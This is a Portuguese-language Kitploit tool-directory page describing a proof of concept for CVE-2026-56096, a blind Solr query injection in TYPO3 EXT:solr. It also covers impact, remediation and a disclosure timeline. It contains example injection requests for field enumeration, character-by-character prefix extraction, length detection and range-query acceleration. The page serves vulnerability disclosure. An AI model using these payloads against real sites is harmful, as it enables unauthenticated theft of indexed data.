Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-56096 — Prova de conceito e análise técnica para CVE-2026-56096, uma injeção cega de consulta Solr no TYPO3 EXT:solr que permite enumeração de campos e extração de dados sem autenticação. | Kitploit
Ferramentas/GitHubGitHub/yairhinkis/cve-2026-56096
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebPapers e Pesquisa
GitHubyairhinkis/cve-2026-56096

CVE-2026-56096

Prova de conceito e análise técnica para CVE-2026-56096, uma injeção cega de consulta Solr no TYPO3 EXT:solr que permite enumeração de campos e extração de dados sem autenticação.

Ver Repositório
há 10h 16mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-56096: Injeção de Consulta Solr e Extração Cega de Dados no TYPO3 EXT:solr

Uma vulnerabilidade de segurança arquitetural foi descoberta na extensão oficial do TYPO3 Apache Solr (EXT:solr / apache-solr-for-typo3/solr). O problema permite que atacantes remotos não autenticados injetem sintaxe de consulta Solr/Lucene arbitrária através do parâmetro de busca tx_solr[q], possibilitando enumeração cega não autorizada de campos e extração completa de metadados do índice de busca.


Metadados

  • CVE ID: CVE-2026-56096
  • Tipo de Vulnerabilidade: CWE-943: Neutralização Imprópria de Elementos Especiais em Lógica de Consulta de Dados
  • Componente Alvo: EXT:solr (Parâmetro de busca: tx_solr[q])
  • Pontuação CVSS v4.0: 6.3 (Média) — CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
  • Pesquisador: Yair Hinkis

  • Visão Geral da Vulnerabilidade

    A extensão EXT:solr aceita termos de busca fornecidos pelo usuário através do parâmetro tx_solr[q] e os encaminha para o motor Apache Solr. Por design, a extensão permite operadores de consulta específicos—como curingas (*), curingas de caractere único (?), seletores de campo (:) e consultas de intervalo ([a TO z])—para suportar funcionalidades legítimas como filtragem facetada.

    Como esses caracteres eram passados diretamente para a construção da consulta de backend sem uma lista de permissões restritiva ou camada de abstração de consulta, um atacante pode fornecer sintaxe específica de campo para escapar dos limites de busca pretendidos. Isso permite que usuários não autenticados consultem campos internos do Solr diretamente e extraiam dados do índice usando técnicas cegas baseadas em booleanos.


    Técnicas de Ataque

    1. Enumeração de Campos via field:*

    Ao anexar um curinga a um nome de campo arbitrário ou adivinhado, um atacante pode verificar se o campo existe dentro do esquema:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:* HTTP/1.1
    Host: target.example.com
    
    

    Se o campo existir, o Solr processa a consulta em todos os registros correspondentes (frequentemente acionando códigos de resposta distintos ou comportamentos relacionados ao volume), permitindo enumeração automatizada de campos baseada em wordlist.


    2. Extração Cega de Valores via Curingas de Prefixo

    Atacantes podem extrair valores de campos sensíveis caractere por caractere usando inferência booleana:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:a* HTTP/1.1  --> Retorna resultados de busca (Valor começa com 'a')
    GET /search?tx_solr[q]=siteHash:b* HTTP/1.1  --> "Nada encontrado" (Valor não começa com 'b')
    
    

    3. Detecção de Comprimento via o Operador ?

    O operador curinga de caractere único (?) pode determinar o comprimento exato de uma string armazenada antes de iniciar a iteração de caracteres:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:????????????* HTTP/1.1   (Verifica 12+ caracteres)
    GET /search?tx_solr[q]=siteHash:?????????????* HTTP/1.1  (Verifica 13+ caracteres)
    
    

    4. Consultas de Intervalo Aceleradas ([a TO z])

    Consultas de intervalo permitem extração por busca binária no caractere inicial, reduzindo as requisições necessárias de 26 para ~5 por posição de caractere:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:[a TO m] HTTP/1.1  --> Determina se o caractere está entre 'a'-'m'
    GET /search?tx_solr[q]=siteHash:[n TO z] HTTP/1.1  --> Determina se o caractere está entre 'n'-'z'
    
    

    Combinar detecção de comprimento, consultas de intervalo e curingas de prefixo permite extração completa de campos com um footprint mínimo de requisições.


    Impacto

    • Violação de Confidencialidade: Extração completa de todos os campos indexados no Apache Solr (por exemplo, hashes internos do sistema, conteúdo de páginas ocultas, metadados relacionados a usuários e identificadores de sistema).
    • Bypass de Controle de Acesso: Contorna filtros de busca do frontend e restrições de exibição do TypoScript.
    • Escopo: Afetou todas as instalações padrão que utilizam o endpoint de busca EXT:solr.

    Remediação

    O escape global de caracteres é insuficiente porque operadores como * e : servem a funcionalidades de busca pretendidas. A remediação requer uma lista de permissões na camada de aplicação e um modelo de parsing:

    1. Analisar strings de consulta fornecidas pelo usuário em uma Árvore de Sintaxe Abstrata (AST) antes de despachar para o motor Solr.
    2. Aplicar listas de permissões estritas sobre alvos de campos permitidos, proibindo consultas diretas de usuários contra campos internos ou restritos.
    3. Neutralizar o abuso de operadores não permitidos originados de contextos de entrada não confiáveis.

    Cronograma de Divulgação Coordenada

    • 6 de março de 2026: Vulnerabilidade identificada durante uma avaliação autorizada; notificação inicial ao fornecedor.
    • 17 de abril de 2026: Fornecedor implementou mitigações locais de borda; confirmou a natureza do bug upstream.
    • 8 de maio de 2026: Relatório formal de vulnerabilidade submetido à Equipe de Segurança do TYPO3 ([email protected]).
    • 15 de junho de 2026: Equipe de Segurança do TYPO3 confirmou a reprodução e iniciou o desenvolvimento do patch com os mantenedores da extensão.
    • 25 de agosto de 2026: Boletim de segurança oficial emitido, patch publicado e CVE-2026-56096 atribuído.

    Referências

    • Aviso de Segurança do TYPO3: TYPO3-EXT-SA-2026-025
    • Definição CWE: CWE-943: Neutralização Imprópria de Elementos Especiais em Lógica de Consulta de Dados
    Baixar ferramenta